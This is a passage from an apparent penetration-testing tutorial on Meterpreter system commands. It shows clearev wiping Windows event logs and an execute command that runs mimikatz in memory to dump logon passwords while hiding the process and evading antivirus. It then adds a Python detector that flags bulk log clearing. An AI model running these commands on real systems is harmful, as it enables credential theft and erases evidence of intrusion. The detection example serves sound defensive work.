Understanding the Meterpreter system commands
Meterpreter system commands allow you to access system-specific commands without dropping to a shell session.
How to do it...
- The clearev command clears the Application, System, and Security logs on the target system:
meterpreter > clearev
[*] Wiping 525 records from Application...
[*] Wiping 1916 records from System...
[*] Wiping 1565 records from Security...
- The execute command executes a command on the target. The awesome thing about the execute command is that it allows us to run commands from memory without uploading the binary to the target, effectively bypassing several antivirus products.
In the next example, I will show you how to run mimikatz directly in memory. The command I will use is the following:
execute -H -i -c -m -d calc.exe -f /usr/share/mimikatz/x64/mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'
From the preceding command:
-H hides the process
-i allows us to interact with the process after we create it
-c channels the I/O...
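
The clearev run shown earlier wipes three logs within seconds, and Windows records each wipe: event 1102 in the Security log and event 104 in the System log. The following added example (not part of the original text) flags hosts where several logs are cleared in a short window, reading events that have already been forwarded to a central collector. The record layout, the "cleared" field name, the host names and the sample events are constructed for illustration.

```python
from datetime import datetime, timedelta

# Constructed sample records, shaped like events forwarded to a collector.
# Event 1102 (Security channel) = the audit log was cleared.
# Event 104 (System channel) = the log named in "cleared" was cleared.
# The "cleared" key is a simplified, hypothetical field name.
SAMPLE_EVENTS = [
    {"host": "WS01", "time": "2024-05-01T10:15:02", "channel": "System",
     "event_id": 104, "cleared": "Application"},
    {"host": "WS01", "time": "2024-05-01T10:15:03", "channel": "System",
     "event_id": 104, "cleared": "System"},
    {"host": "WS01", "time": "2024-05-01T10:15:03", "channel": "Security",
     "event_id": 1102},
    {"host": "SRV02", "time": "2024-05-01T09:00:00", "channel": "System",
     "event_id": 104, "cleared": "Application"},
    {"host": "SRV02", "time": "2024-05-01T11:30:00", "channel": "System",
     "event_id": 7036},
]

def cleared_log(event):
    """Return the name of the log an event reports as cleared, or None."""
    if event["channel"] == "Security" and event["event_id"] == 1102:
        return "Security"
    if event["channel"] == "System" and event["event_id"] == 104:
        return event.get("cleared")
    return None

def find_bulk_clears(events, window_seconds=60, min_logs=2):
    """Flag hosts where min_logs distinct logs were cleared within the window."""
    per_host = {}
    for ev in events:
        log = cleared_log(ev)
        if log:
            stamp = datetime.fromisoformat(ev["time"])
            per_host.setdefault(ev["host"], []).append((stamp, log))
    alerts = []
    window = timedelta(seconds=window_seconds)
    for host, clears in sorted(per_host.items()):
        clears.sort()
        for i, (start, _) in enumerate(clears):
            logs = {log for ts, log in clears[i:] if ts - start <= window}
            if len(logs) >= min_logs:
                alerts.append({"host": host, "start": start.isoformat(),
                               "logs": sorted(logs)})
                break  # one alert per host is enough
    return alerts

if __name__ == "__main__":
    for alert in find_bulk_clears(SAMPLE_EVENTS):
        print(alert)
```

A single routine log clear on SRV02 stays below the default threshold, while the three near-simultaneous clears on WS01 raise one alert.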